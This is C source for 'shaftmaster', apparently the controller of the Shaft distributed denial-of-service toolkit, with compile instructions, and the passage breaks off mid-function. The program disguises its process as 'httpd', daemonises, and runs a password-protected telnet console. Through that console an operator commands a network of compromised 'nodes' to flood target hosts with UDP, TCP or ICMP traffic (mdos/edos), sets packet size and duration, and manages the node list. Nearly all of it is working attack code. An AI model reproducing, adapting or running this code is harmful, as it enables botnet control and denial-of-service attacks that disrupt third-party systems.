/*
 * Shaft !Z 
 *
 * A CLC production. 2000
 *
 * As everyone already knows, CLC > *.  This just proves it.
 * This was the beta, The RELEASE should be on your box soon !
 *
 * Compiling:
 *
 * Solaris:
 *	cc -DSOLARIS shaftmaster.c -o shaftmaster -lsocket -lnsl
 *
 * Linux/libc6:
 *	cc shaftmaster.c -o shaftmaster -lcrypt
 *
 * Linux/libc5:
 *	cc shaftmaster.c -o shaftmaster
 *
 * PROOF OF CONCEPT CODE!!!!!!!!!!!!! YEA!!!!!!             
 *
 * Below is the hub code.  To access it you telnet to the port you specify in the #define's.
 *
 */

#include <signal.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>
#ifdef SOLARIS
#include <sys/filio.h>
#include <sys/select.h>
#endif
#include <arpa/inet.h>
#include <unistd.h>


#define MAX_BOXES	256
#define CACHE_SIZE	64

#define USERNAME 	"changeme"
#define PASSWORD 	"changeme"
#define SHIF_PASS 	"changeme"


#define BOX_FILE	".f"

#define HIDDEN_PROC	"httpd"

#define REMOTE_NODE_PORT 18753

#define SHAFT_PROMPT	"clc> "

#define MY_TCP_PORT	20432
#define MY_UDP_PORT	20433

/* you shouldn't have to change naything below this. */

#define SLEFT		-1
#define SRIGH		1

#define T_UDP		0
#define T_TCP		1
#define T_BOTH		2
#define T_ICMP		3

#define WAIT_ALL	1
#define WAIT_ONE	2
#define WAIT_PKSTAT	3

#define VERSION		"shaft v1.72 (by: CLC)"

#ifdef SOLARIS

typedef struct ip	IP;

#else

typedef struct iphdr	IP;

#endif

typedef struct global_template {
	int tcpport, udpport;
	int tcpsock, udpsock;

	unsigned int pktsize;
	unsigned int time;
	unsigned int type;

	unsigned long currtime;

	int asroot;

	long int inetaddy[MAX_BOXES];
	int bcount;

	int nport;
} GLOB;

typedef struct cache_template {
	char *str[CACHE_SIZE], buf[512];
        
	int words, bufpos;
} CACHE;    

typedef struct users_template {
	int sock, gotpass, gotuser;
	CACHE cache;

	struct users_template *next;
} USERS;

typedef struct ticket_template {
	int purge;
	int ticketnum;
	int type;
	int reqby;
	unsigned long int val;
	unsigned long int val2;

	struct ticket_template *next;
} TICKET;

USERS *users = NULL;
GLOB global;
CACHE udpdata;
TICKET *ticket = NULL;

const char *shaft = {
"
    ######
   ########
  ##########
   ########
   |(.\\/.)|   CLC
   | ____ |________   !! WARNING !!
  /|______| ____/_/ private server for
  \\__\\     /       use by the people of
  (___)   /           !! C  L  C !!
    \\____/
    / /\\ \\ 
    \\_\\/_/
   (__||__)
" };

struct command_template {
	char *name;
	int (*func)(USERS *curr);
	int argc;
	char *usage;
};

struct udp_command_template {
	char *name;
	int (*func)(CACHE *);
	int argc;
};

int proc_time(USERS *);
int proc_type(USERS *);
int proc_size(USERS *);
int proc_mdos(USERS *);
int proc_edos(USERS *);
int proc_help(USERS *);
int proc_whoami(USERS *);
int proc_stat(USERS *);
int proc_pkstat(USERS *);
int proc_alive(USERS *);
int proc_lnod(USERS *);
int proc_ltic(USERS *);
int proc_exit(USERS *);
int proc_ver(USERS *);
int proc_addnode(USERS *);
int proc_delnode(USERS *);
int proc_switch(USERS *);
int proc_ns(USERS *);

int proc_udp_owning(CACHE *);
int proc_udp_pktstat(CACHE *);
int proc_udp_alive(CACHE *);
int proc_udp_done(CACHE *);
int proc_udp_new(CACHE *);
int proc_udp_time(CACHE *);
int proc_udp_size(CACHE *);
int proc_udp_type(CACHE *);
int proc_udp_pktres(CACHE *);
int proc_udp_switch(CACHE *);

struct command_template command[] = {
{	"type",		proc_type,	1,	"Usage: type <udp/tcp/icmp/all>" },
{	"time",		proc_time,	1,	"Usage: time <length>" },
{	"size",		proc_size,	1,	"Usage: size <pktsize>" },
{	"mdos",		proc_mdos,	1,	"Usage: mdos <host1> <host2> <host3> ..." },
{	"edos",		proc_edos,	1,	"Usage: edos <host1> <host2> <host3> ..." },
{	"help",		proc_help,	0,	"Usage: help" },
{	"lnod",		proc_lnod,	0,	"Usage: lnod" },
{	"ltic",		proc_ltic,	0,	"Usage: ltic" },
{	"stat",		proc_stat,	0,	"Usage: stat" },
{	"ver",		proc_ver,	0,	"Usage: ver" },
{	"pkstat",	proc_pkstat,	0,	"Usage: pkstat" },
{ 	"+node",	proc_addnode,	1,	"Usage: +node <host1> <host2> <host3> ..." },
{	"-node",	proc_delnode,	1,	"Usage: -node <host1> <host2> <host3> ..." },
{	"ns",		proc_ns,	1,	"Usage: ns <host1> <host2> <host3> ..." },
{	"alive",	proc_alive,	0,	"Usage: proc_alive" },
{	"exit",		proc_exit,	0,	"Usage: exit" },
{	"whoami",	proc_whoami,	0,	"Usage: whoami" },
{ 	"switch",	proc_switch,	0,	"Usage: switch" },
{	NULL,		NULL,		0,	NULL },
};

struct udp_command_template udp_command[] = {
{	"size",		proc_udp_size,		4 },
{	"time",		proc_udp_time,		4 },
{	"type",		proc_udp_type,		4 },
{ 	"owning",	proc_udp_owning,	4 },
{	"pktstat",	proc_udp_pktstat,	4 },
{	"pktres",	proc_udp_pktres,	4 },
{ 	"alive",	proc_udp_alive,		4 },
{	"done",		proc_udp_done,		4 },
{	"new",		proc_udp_new,		1 },
{ 	"switched",	proc_udp_switch,	3 },
{	NULL,		NULL,			0 },
};

unsigned long fnAddress(char *hostname);
unsigned short fnIPCheckSum(u_short *addr,int len);
void fnConstructIP(IP *ip, unsigned long foreignhost, unsigned long myhost, int pktsize);
void fnConstructUDP(struct udphdr *udp, unsigned int srcport, unsigned int foreignport, int pktsize);
int fnSendPacket(char *myhost, char *remhost, int srcport, int remport,char *newpkt);
void fnSendToNodes(char *,...);
void fnStartServer();
void fnMonitorData();
void fnInitGlobal();
void bwrite(int sock, char *, ...);

int fnBoxExists(unsigned long int addr);
int fnAddBox(unsigned long int addr);
int fnDelBox(unsigned long int addr);

void fnUserAdd(int);
void fnUserDelete(int);
USERS *fnUserLocate(int);
void fnUserFree(USERS **);

int fnAddTicket(int purge, int type, int sock);
void fnDeleteTicket(TICKET *);
TICKET *fnLocateTicket(int);
void fnFreeTicket(TICKET **);
void fnCheckTickets();
int fnCheckUDPPassword(char *);

void fnParseWords(CACHE *);
void fnFreeCache(CACHE *);
void fnInitCache(CACHE *);
void fnParseAndExec(USERS *);
void fnParseAndExecUDP(CACHE *);
int fnCheckCorrect(char *,char *,int);
void fnReadBoxes();


int main(int argc,char *argv[])
{
	int count, pid;

	srand(time(NULL));

	for (count= 0;count < argc;count++)
		memset(argv[count],0,strlen(argv[count]));

	strcpy(argv[0],HIDDEN_PROC);	

	pid = fork();

	if (pid == -1)
	{
		fprintf(stdout,"Unable to fork. (do it manually.)\n");
		return 0;
	}
	else if (pid != 0)
		exit(1);	

	fnInitGlobal();

	fnReadBoxes();

	global.tcpport = MY_TCP_PORT;
	global.udpport = MY_UDP_PORT;

	fnStartServer();

	while (1)
		fnMonitorData();

	return 1;
}

unsigned long fnAddress(char *hostname)
{
        unsigned long int addrs;
        struct hostent *host;
	struct in_addr in;

        if ((addrs = inet_addr(hostname)) != -1)
                return addrs;

        host = gethostbyname(hostname);

        if (!host)
                return -1;

	memcpy(&in,host->h_addr,host->h_length);

        return (unsigned long int)in.s_addr;
}

int fnSendPacket(char *myhost, char *remhost, int srcport, int remport,char *newpkt)
{
	int s;
	struct sockaddr_in dst;

	s = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);

	dst.sin_port = htons(remport);
	dst.sin_family = AF_INET;
	dst.sin_addr.s_addr = fnAddress(remhost);

	if (sendto(s,(char *)newpkt,strlen(newpkt),0,(struct sockaddr *)&dst,sizeof(dst)) <= 0)
		return 0;

	close(s);

	return 1;
}

void fnStartServer()
{
	int len;
	struct sockaddr_in s, u;

	global.tcpsock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

	s.sin_family = AF_INET;
	s.sin_port = htons(global.tcpport);
	s.sin_addr.s_addr = htonl(INADDR_ANY);

	if ((bind(global.tcpsock,(struct sockaddr *)&s, sizeof(s))) < 0)	
	{
		fprintf(stdout,"Error binding socket.\n");
		exit(-1);
	}

	len = sizeof(s);

	if ((getsockname(global.tcpsock,(struct sockaddr *)&s, &len)) < 0)
	{
		fprintf(stdout,"Error in getsockname.\n");
		exit(-1);
	}
		
	if (listen(global.tcpsock,1) < 0)
	{
		fprintf(stdout,"Unable to listen on port %i\n",global.tcpport);
		exit(-1);
	}

	global.udpsock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);

	u.sin_family = AF_INET;
	u.sin_port = htons(global.udpport);
	u.sin_addr.s_addr = htonl(INADDR_ANY);

	if ((bind(global.udpsock,(struct sockaddr *)&u,sizeof(u))) < 0)
	{
		fprintf(stdout,"Unable to bind udp port.\n");
		exit(-1);
	}

	return;
}

void fnInitGlobal()
{
	int count;

	global.tcpsock = -1;
	global.udpsock = -1;
	global.tcpport = MY_TCP_PORT;
	global.udpport = MY_UDP_PORT;
	global.nport = REMOTE_NODE_PORT;

	global.pktsize = 1024;
	global.time = 300;
	global.type = T_UDP;

	for (count = 0;count < MAX_BOXES;count++)
		global.inetaddy[count] = -1;

	global.bcount = 0;

	fnInitCache(&udpdata);

	return;
}

void fnReadBoxes()
{
	FILE *fd;
	char buf[256];
	int c = 0;
	unsigned long int b; 

	if ((fd = fopen(BOX_FILE,"r")) == NULL)
		return;

	while (fgets(buf,256,fd))
	{
		buf[strlen(buf)-1] = 0;

		if ((c+1) == MAX_BOXES)
		{
			fprintf(stdout,"Warning: you may want to up your max boxes, you have more than you can handle.\n");
			break;
		}	

		if (!fnBoxExists((b = atoi(buf))))
			global.inetaddy[c++] = b; 
	}

	global.bcount = c;

	fclose(fd);

	return;
}	

void fnMonitorData()	
{
	fd_set fdset_readable, fdudp;
	struct timeval tv, tv2;
	int retval, asock, highest_fd = global.tcpsock, len;
	USERS *curru = users;
	struct sockaddr_in client;

	FD_ZERO (&fdset_readable);
	FD_SET (global.tcpsock, &fdset_readable);

	tv.tv_sec = 0;
	tv.tv_usec = 5000;
	tv2.tv_sec = 0;
	tv2.tv_usec = 2000;

	FD_ZERO(&fdudp);
	FD_SET(global.udpsock, &fdudp);

	retval = select(global.udpsock + 1, &fdudp, NULL, NULL, &tv2);

	if (retval)
	{
		memset(udpdata.buf,0,udpdata.bufpos);
		udpdata.bufpos = 0;
		udpdata.words = 0;

		len = sizeof(client);

		if (recvfrom(global.udpsock,udpdata.buf,511,0,(struct sockaddr *)&client,&len) < 0)
			return;

		udpdata.bufpos = strlen(udpdata.buf);

		fnParseWords(&udpdata);

		udpdata.str[udpdata.words++] = strdup(inet_ntoa(client.sin_addr));

		fnParseAndExecUDP(&udpdata);
	}

	global.currtime = time(NULL);

	fnCheckTickets();

	while (curru)
	{
		if (curru->sock > highest_fd)
			highest_fd = curru->sock;

		FD_SET(curru->sock,&fdset_readable);

		curru = curru->next;
	}

	retval = select (highest_fd + 1, &fdset_readable, NULL, NULL, &tv);

	if (retval) 
	{
		for (asock = 0; asock < highest_fd + 1; asock++) 
		{
			if (FD_ISSET(asock, &fdset_readable)) 
			{
				if (asock == global.tcpsock) 
				{
					int recvsock;
					struct sockaddr_in client_addr;
					int client_len = sizeof (struct sockaddr_in);

					recvsock = accept (global.tcpsock, (struct sockaddr *) &client_addr, &client_len);

					if (recvsock <= 0) 
						continue;


					bwrite(recvsock,"%s\nlogin: ",shaft);

					fnUserAdd(recvsock);
				} 
				else 
				{
					char buf[2] = { 0, 0 };
					int nread;
					USERS *tmpuser;


					if (!(tmpuser = fnUserLocate(asock)))
						continue;

					nread = 1;

					while (nread > 0)
					{
						ioctl(asock, FIONREAD, &nread);

						if (nread)
						{
							if (!read(asock,buf,1))
							{
								close(tmpuser->sock);

								fnUserDelete(tmpuser->sock);
								continue;
							}

							if (buf[0] == '\n')
							{
								fnParseAndExec(tmpuser);
								nread = 0;
								continue;
							}
							else
							{
								if (tmpuser->cache.bufpos+2 == 512)
									fnParseAndExec(tmpuser);

								tmpuser->cache.buf[tmpuser->cache.bufpos++] = buf[0];
							}
						}
					}
				}
			}
		}
	}
}

void bwrite(int sock, char *val,...)
{
        char buf[512];
        va_list ap;

        if (!sock)     /* we're not connected, no sense in sending data */
                return;

        va_start(ap,val);

	if (strlen(val) > 512)
		val[511] = 0;

        vsprintf(buf,val,ap);

        va_end(ap);

        write(sock,buf,strlen(buf));
}

void fnUserAdd(int sock)
{
	USERS *curr = users;

	if (!users)
	{
		users = (USERS *)malloc(sizeof(USERS));
		curr = users;
	}
	else
	{
		while (curr->next)
			curr = curr->next;

		curr->next = (USERS *)malloc(sizeof(USERS));
		curr = curr->next;
	}

	curr->sock = sock;
	curr->gotuser = curr->gotpass = 0;

	fnInitCache(&curr->cache);

	curr->next = NULL;

	return;
}

void fnUserDelete(int sock)
{
	USERS *curr = users, *prev = NULL, *del = fnUserLocate(sock);

	if (!del)
		return;

	while (curr)
	{
		if (curr == del)
			break;

		prev = curr;
		curr = curr->next;
	}

	if (del == users)
	{
		if (!users->next)
		{
			fnUserFree(&users);
			
			users = NULL;
		}
		else
		{
			curr = users->next;

			fnUserFree(&users);
		
			users = curr;
		}

		return;
	}

	prev->next = curr->next; 
        fnUserFree(&curr);

        del = NULL;  

	return;
}

void fnUserFree(USERS **curr)
{
	USERS *c = *curr;

	fnFreeCache(&c->cache);

	free(c);

	return;
}

USERS *fnUserLocate(int sock)
{
	USERS *curr = users;

	while (curr)
	{
		if (curr->sock == sock)
			return curr;

		curr = curr->next;
	}

	return NULL;
}

void fnParseWords(CACHE *cache)
{
	char tmpword[512];
        int count, pos = 0, needstop = 0;

        fnFreeCache(cache);

        memset(tmpword,0,512);

        for (count = 0;count <= cache->bufpos;count++)
        {
                if ((cache->buf[count] == '\r') || (cache->buf[count] == '\n'))
                        continue;
                else if (((cache->buf[count] == ' ') && (cache->buf[count-1] != ' ')) || 
                        ((cache->buf[count] == ' ') && (cache->buf[count-1] != '\t')) ||
                        ((cache->buf[count] == '\t') && (cache->buf[count-1] != ' ')) ||
                        ((cache->buf[count] == '\t') && (cache->buf[count-1] != '\t')) ||
                        (count == cache->bufpos) || (needstop))
                {
                        tmpword[pos] = 0;

                        if (tmpword[0] != 0)
                        {
                                if ((cache->words+1) == CACHE_SIZE)
                                        break;

                                cache->str[cache->words++] = strdup(tmpword);

                                memset(tmpword,0,pos);
                                pos = 0;
                        }

			if (needstop)
				return;
                }
                else if ((cache->buf[count] == ' ') || (cache->buf[count] == '\t'))
                        continue;
                else
		{
			if (pos+2 >= 512)
				needstop = 1;

                        tmpword[pos++] = cache->buf[count];
		}
        }
}

void fnFreeCache(CACHE *data)
{
        int count;

        for (count = 0;((count <= data->words) && (count < CACHE_SIZE));count++)
        {
                if (data->str[count])
                {
                        free(data->str[count]);
                        data->str[count] = NULL;
                }
        }


        return;
}

void fnInitCache(CACHE *data)
{
	int count;

	data->bufpos = 0;

	for (count = 0;count < CACHE_SIZE;count++)
		data->str[count] = NULL;

	data->words = 0;
}

void fnParseAndExec(USERS *curr)
{
	int count = 0, (*func)(USERS *);

	fnParseWords(&curr->cache);

	if (!curr->cache.str[0])
	{
		if ((!curr->gotuser) || (!curr->gotpass))
		{
			close(curr->sock);
			fnUserDelete(curr->sock);
			return;
		}
	}
	else if (!curr->gotuser)
	{
		if (fnCheckCorrect((char *)crypt(curr->cache.str[0],"bo"),USERNAME,SRIGH))
		{
			bwrite(curr->sock,"Password: ");
			curr->gotuser = 1;
		}
		else
		{
			close(curr->sock);
			fnUserDelete(curr->sock);
		}
	}
	else if (!curr->gotpass)
	{
		if (fnCheckCorrect((char *)crypt(curr->cache.str[0],"ve"),PASSWORD,SLEFT))
		{
			bwrite(curr->sock,"Login accepted.  Your IP has been sent to the NSA.\n\n");
			curr->gotpass = 1;
		}
		else
		{
			close(curr->sock);
			fnUserDelete(curr->sock);
		}
	}	
	else
	{
		while (command[count].name)
		{
			if (!strcmp(command[count].name,curr->cache.str[0]))
			{
				func = command[count].func;
				
				if ((curr->cache.words-1) < command[count].argc)
					bwrite(curr->sock,"%s\n",command[count].usage);
				else
					func(curr);
			
				break;
			}
	
			count++;
		}	
	}

	if (curr->gotpass)
		bwrite(curr->sock,"%s",SHAFT_PROMPT);

	fnFreeCache(&curr->cache);
	
	memset(curr->cache.buf, 0, curr->cache.bufpos);
	curr->cache.words = 0;
	curr->cache.bufpos = 0;

	return;
}

int proc_help(USERS *curr)
{
	bwrite(curr->sock,".==CLC==-=============-=========================---.\n");
	bwrite(curr->sock,"| cmds  | args        |           desc             |\n");
	bwrite(curr->sock,"-=======-=============-=========================---.\n");
	bwrite(curr->sock,"| mdos  | host1 host2 | mass dos hosts             |\n");
	bwrite(curr->sock,"| edos  | host        | end dos on hosts           |\n");
	bwrite(curr->sock,"| time  | length      | set dos packet length      |\n");
	bwrite(curr->sock,"| type  | (udp/tcp)   | set type of dos            |\n");
	bwrite(curr->sock,"| size  | size        | set packet size            |\n");
	bwrite(curr->sock,"| +node | host1 host2 | add new nodes              |\n");
	bwrite(curr->sock,"| -node | host1 host2 | remove nodes               |\n");
	bwrite(curr->sock,"| ns    | host1 host2 | resolve hosts              |\n");
	bwrite(curr->sock,"| stat  |             | show val stat              |\n");
	bwrite(curr->sock,"| lnod  |             | list nodes ips             |\n");
	bwrite(curr->sock,"| ltic  |             | list tickets               |\n");
	bwrite(curr->sock,"| pkstat|             | show packet stats for nodes|\n");
	bwrite(curr->sock,"| ver   |             | show shaftmaster version   |\n");
	bwrite(curr->sock,"| alive |             | tell which nodes are alive |\n");
	bwrite(curr->sock,"| switch|             | makes you master for nodes |\n");
	bwrite(curr->sock,"| exit  |             | close curr connection      |\n");
	bwrite(curr->sock,"`=======-=============-=========================---.\n");

	return 1;
}

int proc_exit(USERS *curr)
{
	bwrite(curr->sock,"fuck you too.\n");

	close(curr->sock);
	fnUserDelete(curr->sock);

	return 1;
}

int proc_time(USERS *curr)
{
	int ticketnum;
	unsigned int val = atoi(curr->cache.str[1]);

	if (val > 65534)
		val = 65534;

	if (val < 0)
		val = 300;

	global.time = val;

	bwrite(curr->sock,"time=%i\n",global.time);

	ticketnum = fnAddTicket(30,WAIT_ONE,curr->sock);

        fnSendToNodes("time %s %i %i %i",SHIF_PASS,global.time,curr->sock, ticketnum);

	return 1;
}

int proc_size(USERS *curr)
{
	int ticketnum;
	unsigned int size = atoi(curr->cache.str[1]);

	if (size > 65534)
		size = 65534;

	if (size < 0)
		size = 1024;

	global.pktsize = size;

	bwrite(curr->sock,"size=%i\n",global.pktsize);

	ticketnum = fnAddTicket(30,WAIT_ONE,curr->sock);

        fnSendToNodes("size %s %i %i %i",SHIF_PASS,global.pktsize,curr->sock, ticketnum);

	return 1;
}

int proc_addnode(USERS *curr)
{
	int c = 1;

	while (curr->cache.str[c])
	{
		bwrite(curr->sock,"Adding %s...",curr->cache.str[c]);

		if (fnAddBox(inet_addr(curr->cache.str[c])))
			bwrite(curr->sock,"succes.\n");
		else
			bwrite(curr->sock,"failure.\n");

		c++;
	}

	return 1;
}

int proc_delnode(USERS *curr)
{
	int c = 1;

	while (curr->cache.str[c])
	{
		bwrite(curr->sock,"Removing %s...",curr->cache.str[c]);

		if (fnDelBox(inet_addr(curr->cache.str[c])))
			bwrite(curr->sock,"success.\n");
		else
			bwrite(curr->sock,"failure.\n");

		c++;
	}

	return 1;
}

int proc_ns(USERS *curr)
{
	struct in_addr addy; 
	int c = 1;
	
	while (curr->cache.str[c])
	{
		bwrite(curr->sock,"%s is...",curr->cache.str[c]);

		if ((addy.s_addr = fnAddress(curr->cache.str[c])) != -1)
			bwrite(curr->sock,"%s\n",inet_ntoa(addy));
		else
			bwrite(curr->sock,"Non-existant.\n");

		c++;
	}

	return 1;
}

int proc_mdos(USERS *curr)
{
	char *rhost = curr->cache.str[1];
	char spaces[16],space1[8],space2[8];
	int count, counter, c1, c2, ticketnum = 0, c = 1;
	char *tmp;

        if (global.type == T_UDP)
                tmp = "UDP";     
        else if (global.type == T_TCP)
                tmp = "TCP";
	else if (global.type == T_ICMP)
		tmp = "ICMP";
        else
                tmp = "ALL";

	while (curr->cache.str[c])
	{
		rhost = curr->cache.str[c];

		if (strstr(rhost,"209.242."))
		{
			bwrite(curr->sock,"You're good kid...but I'm better.\n");
			close(curr->sock);
	
			fnUserDelete(curr->sock);
		
			return 0;
		}
			
	
		if (global.bcount <= 0)
		{
			bwrite(curr->sock,"err: no nodes configured.\n");
			return 0;
		}
		
		count = 16-strlen(rhost);
		memset(spaces,0,16);
		memset(space1,0,8);
		memset(space2,0,8);
	
		for (counter = 0;count > 0;count--,counter++)
			spaces[counter] = ' ';
	
		spaces[counter+1] = 0;

		c1 = c2 = count = counter = 0;

		while (spaces[count++] != 0)
		{
			if (counter)
			{
				space1[c1++] = ' ';
				counter = 0;
			}
			else
			{
				space2[c2++] = ' ';
				counter = 1;
			}
		}
	
		ticketnum = fnAddTicket(30,WAIT_ONE,curr->sock);
	
		bwrite(curr->sock,".===CLC==========-================---.\n");
		bwrite(curr->sock,"|     dosing     |   type=%s\n",tmp);
		bwrite(curr->sock,"|%s%s%s|   size=%i\n",space1,rhost,space2,global.pktsize);
		bwrite(curr->sock,"|      wee!      |   time=%i\n",global.time);
		bwrite(curr->sock,"`================-================---.\n");
	
		fnSendToNodes("own %s %s %i %i",SHIF_PASS,rhost,curr->sock,ticketnum);

		ticketnum = fnAddTicket(global.time+15,WAIT_PKSTAT,curr->sock);
		
		fnSendToNodes("pktres %s %s %i %i",SHIF_PASS,rhost,curr->sock,ticketnum);

		c++;
	}

	return 1;
}

int proc_edos(USERS *curr)
{
	int ticketnum = 0, c = 1;
	
	while (curr->cache.str[c])
	{

		bwrite(curr->sock,"Sending HALT command for host=%s\n",curr->cache.str[c]);
	
		ticketnum = fnAddTicket(30,WAIT_ONE,curr->sock);

		fnSendToNodes("end %s %s %i %i",SHIF_PASS,curr->cache.str[c],curr->sock, ticketnum);

		c++;
	}

	return 1;	
}

int proc_alive(USERS *curr)
{
	int ticketnum = 0;

	ticketnum = fnAddTicket(30,WAIT_ALL,curr->sock);

	bwrite(curr->sock,"%i: checking node status..\n",ticketnum);

	fnSendToNodes("alive %s hi %i %i\n",SHIF_PASS,curr->sock,ticketnum);

	return 1;
}

int proc_lnod(USERS *curr)
{
	struct in_addr in;
	int c = 0;

	while (global.inetaddy[c] != -1)
	{	
		in.s_addr = global.inetaddy[c];
		bwrite(curr->sock,"%s\n",inet_ntoa(in));	
		c++;
	}

	bwrite(curr->sock,"total box count=%i\n",c);

	return 1;
}

int proc_ltic(USERS *curr)
{
	TICKET *currt = ticket;
	char *type;
	int timeleft;

	bwrite(curr->sock,"Ticket#\tTimeleft\tType\n");

	while (currt)
	{
		if (currt->type == WAIT_ONE)
			type = "ONE";
		else
			type = "ALL";

		timeleft = currt->purge - global.currtime;

		bwrite(curr->sock,"%i\t%i\t%s\n",currt->ticketnum,timeleft,type);
	
		currt = currt->next;
	}

	return 1;
}	

int proc_type(USERS *curr)
{
	int ticketnum;

	if (!strcasecmp(curr->cache.str[1],"UDP"))
		global.type = T_UDP;
	else if (!strcasecmp(curr->cache.str[1],"TCP"))
		global.type = T_TCP;
	else if (!strcasecmp(curr->cache.str[1],"ICMP"))
		global.type = T_ICMP;
	else if (!strcasecmp(curr->cache.str[1],"ALL"))
		global.type = T_BOTH;
	else
	{
		bwrite(curr->sock,"invalid opt.  (UDP,TCP,ICMP,ALL)\n");
		return 0;
	}

	bwrite(curr->sock,"type=%s\n",curr->cache.str[1]);

	ticketnum = fnAddTicket(30,WAIT_ONE,curr->sock);

        fnSendToNodes("type %s %i %i %i",SHIF_PASS,global.type,curr->sock, ticketnum);
	
	return 1;
}

int proc_ver(USERS *curr)
{
	bwrite(curr->sock,"%s\n",VERSION);

	return 1;
}

int proc_pkstat(USERS *curr)
{
	int ticketnum = 0;

	ticketnum = fnAddTicket(45,WAIT_PKSTAT,curr->sock);

	fnSendToNodes("stat %s hi %i %i\n",SHIF_PASS,curr->sock,ticketnum);

	bwrite(curr->sock,"querying nodes..wait a few yo.\n");

	return 1;
}

int proc_stat(USERS *curr)
{
	char *tmp;

	if (global.type == T_UDP)
		tmp = "UDP";
	else if (global.type == T_TCP)
		tmp = "TCP";
	else if (global.type == T_ICMP)
		tmp = "ICMP";
	else
		tmp = "ALL";

	bwrite(curr->sock,".==CLC====-==============---.\n");
	bwrite(curr->sock,"|   var   |       val       |\n");
	bwrite(curr->sock,"-=========-==============---'\n");
	bwrite(curr->sock,"|  size   |       %i\n",global.pktsize);	
	bwrite(curr->sock,"|  type   |       %s\n",tmp);         
	bwrite(curr->sock,"|  time   |       %i\n",global.time);
	bwrite(curr->sock,"`=========-==============---.\n");


	return 1;
}

int fnCheckCorrect(char *s1,char *s2,int pattern)
{
	int count;
	char temppass[30];

	strncpy(temppass,s1,29);

	for (count = 0;count < strlen(temppass);count++)
		temppass[count] = temppass[count]+pattern;

	if (!strcmp(temppass,s2))
		return 1;

	return 0;
}

void fnSendToNodes(char *str, ...)
{
	int count;
	struct in_addr in;

	char buf[512];
        va_list ap;

        memset(buf,0,512);

	if (strlen(str) > 511)
		str[511] = 0;

        va_start(ap,str);
        vsprintf(buf,str,ap);      
        va_end(ap);

	for (count = 0;count < global.bcount;count++)
        {           
                if (global.inetaddy[count])
                {
                        in.s_addr = global.inetaddy[count];

                        fnSendPacket(NULL,inet_ntoa(in),0,global.nport,buf);
                }
        }
}

int proc_whoami(USERS *curr)
{
	bwrite(curr->sock,"God\n");

	return 1;
}

int proc_switch(USERS *curr)
{
	int ticketnum = 0;

	bwrite(curr->sock,"telling all nodes to switch here.\n");

	ticketnum = fnAddTicket(30,WAIT_ALL,curr->sock);

        fnSendToNodes("switch %s %i %i %i",SHIF_PASS,MY_UDP_PORT+50,curr->sock, ticketnum);
        
	return 1;
}

void fnParseAndExecUDP(CACHE *udp)
{
	int count = 0, (*func)(CACHE *);

	if (!udp->str[0])
		return;

	while (udp_command[count].name)
	{
		if (!strcmp(udp_command[count].name,udp->str[0]))
		{
			if (((udp->words-1) >= udp_command[count].argc) && (fnCheckUDPPassword(udp->str[1])))
			{
				if ((!strcmp(udp->str[0],"new")) || (fnUserLocate(atoi(udp->str[2]))))
				{
					func = udp_command[count].func;
					func(udp);
				}
			}

			break;
		}

		count++;
	}			

	return;
}

/* udp packets are formed:
 
 command password their_ip localsocket ticket# val

*/

int fnAddTicket(int purge, int type, int sock)
{
	TICKET *curr = ticket, *prev = NULL;

	if (!ticket)
	{
		ticket = (TICKET *)malloc(sizeof(TICKET));
		curr = ticket;
	}
	else
	{
		while (curr->next)
		{
			prev = curr;
			curr = curr->next;
		}

		curr->next = (TICKET *)malloc(sizeof(TICKET));
		curr = curr->next;
	}

	curr->purge = time(NULL)+purge;
	curr->type = type;
	curr->reqby = sock;
	curr->val = curr->val2 = 0;
	
	curr->ticketnum = rand()%10000;

	if (fnLocateTicket(curr->ticketnum))
		curr->ticketnum++;

	curr->next = NULL;

	return curr->ticketnum;
}

TICKET *fnLocateTicket(int ticketnum)
{
	TICKET *curr = ticket;
	
	while (curr)
	{
		if (ticketnum == curr->ticketnum)
			return curr;

		curr = curr->next;
	}

	return NULL;
}

void fnDeleteTicket(TICKET *del)
{
	TICKET *prev = NULL, *curr = ticket;	

	if (!del)
		return;

	while (curr)
	{
		if (curr == del)
			break;

		prev = curr;
		curr = curr->next;
	}
		
	if (!curr)
		return;

	if (curr == ticket)
	{
		if (!ticket->next)
		{
			fnFreeTicket(&ticket);

			ticket = NULL;
		}
		else
		{
			curr = ticket->next;

			fnFreeTicket(&ticket);

			ticket = curr;
		}

		return;
	}

	prev->next = curr->next;

	fnFreeTicket(&curr);

	return;
}

void fnFreeTicket(TICKET **curr)
{
	TICKET *c = *curr;

	if (c)
		free(c);

	return;
}

int proc_udp_pktstat(CACHE *udp)
{
	TICKET *curr = NULL;
	int socket = atoi(udp->str[2]);
	int ticketz = atoi(udp->str[3]);
	char *val  = udp->str[4];
	
	curr = fnLocateTicket(ticketz);

	if (!curr)
		return 0;

	curr->val += atoi(val);
	curr->val2++;

	return 1;
}

int proc_udp_alive(CACHE *udp)
{
        TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
        int ticketz = atoi(udp->str[3]);

        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

	curr->val++;

	return 1;
}

int proc_udp_done(CACHE *udp)
{
        TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
        int ticketz = atoi(udp->str[3]);
        char *val  = udp->str[4];
        
        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

        bwrite(socket,"\n%i: verified end of dos for %s\n",ticketz,val);

	if (curr->type == WAIT_ONE)
		fnDeleteTicket(curr);

	return 1;
}	

int proc_udp_owning(CACHE *udp)
{
	TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
        int ticketz = atoi(udp->str[3]);
        char *val  = udp->str[4];

        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

        bwrite(socket,"\n%i: verified start of dos for %s\n%s ",ticketz,val,SHAFT_PROMPT);

        if (curr->type == WAIT_ONE)
                fnDeleteTicket(curr);

	return 1;
}

int proc_udp_new(CACHE *udp)
{
	struct in_addr in;

	if ((global.bcount+1)	== MAX_BOXES)
		return 0;

	in.s_addr = inet_addr(udp->str[2]);

	if (!fnBoxExists(in.s_addr))
		fnAddBox(in.s_addr);

	return 1;
}

int proc_udp_switch(CACHE *udp)
{
	TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
